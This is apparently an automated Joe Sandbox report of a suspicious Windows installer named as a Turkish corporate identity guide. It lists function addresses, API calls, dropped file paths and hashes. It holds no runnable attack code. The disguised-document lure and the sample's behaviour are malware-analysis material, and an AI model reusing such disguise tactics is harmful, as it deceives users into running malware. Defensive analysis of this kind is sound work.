                                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                                                                                                                                                            • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405636
                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040565A
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000008), ref: 0040565F
                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 004056A9
                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004056EE
                                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00405722
                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405783
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00405789
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004057E4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                          • String ID: {
                                                                                                                                                                                          • API String ID: 590372296-366298937
                                                                                                                                                                                          • Opcode ID: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                                                                          • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                                                                                                                                                                          • Opcode Fuzzy Hash: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404722 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404889
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 00404895
                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                                                                                                                                                            • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917
                                                                                                                                                                                            • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                            • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                            • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                            • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,76FC3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                                                                                                                                                            • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                            • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                            • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                          • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$Call
                                                                                                                                                                                          • API String ID: 2624150263-2694976400
                                                                                                                                                                                          • Opcode ID: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                                                                          • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                                                                          • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146, xrefs: 004021C3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Thaumaturgical146
                                                                                                                                                                                          • API String ID: 542301482-3016365613
                                                                                                                                                                                          • Opcode ID: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                                                                                                                                                          • Instruction ID: 47658dbbd12ee8008517b47355d5d9d52026a5fb35fba2bce99957a22e6c3eef
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B414C71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB44
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004072EC Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: p!C$p!C
                                                                                                                                                                                          • API String ID: 0-3125587631
                                                                                                                                                                                          • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                                                          • Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
                                                                                                                                                                                          • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1974802433-0
                                                                                                                                                                                          • Opcode ID: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                                                                                                                                                          • Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406B15 Relevance: .3, Instructions: 334COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                          • Instruction ID: 703def0becceeecb9d8561ea32c53bcab4b84ebc773a8a1d0b412cad538f794c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EE1797190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004043F0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004044D0
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004044F1
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 00404573
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004045F2
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040460E
                                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                          • String ID: Call$N$gC@
                                                                                                                                                                                          • API String ID: 3103080414-2733886405
                                                                                                                                                                                          • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                                                          • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                                                                                                                                                                          • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                                                          • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                          • DrawTextW.USER32(00000000,Fjernbetjeningsenhedernes Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000004.00000002.35513408646.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000004.00000002.35513376796.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513440436.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513472157.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000004.00000002.35513694837.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_DHRI_kurumsal kimlik rehberi-2023.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                          • String ID: F$Fjernbetjeningsenhedernes Setup
                                                                                                                                                                                          • API String ID: 941294808-2989215355
                                                                                                                                                                                          • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                                                          • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                                                                                                                                                          • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405F06 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004060A1,?,?), ref: 00405F41
                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F4A
                                                                                                                                                                                            • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D25
                                                                                                                                                                                            • Part of subcall function 00405D15: lstrlenA.KERNEL32(00000000,?,00000000,00405FFA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D57
                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F67
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405F85
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405FC0
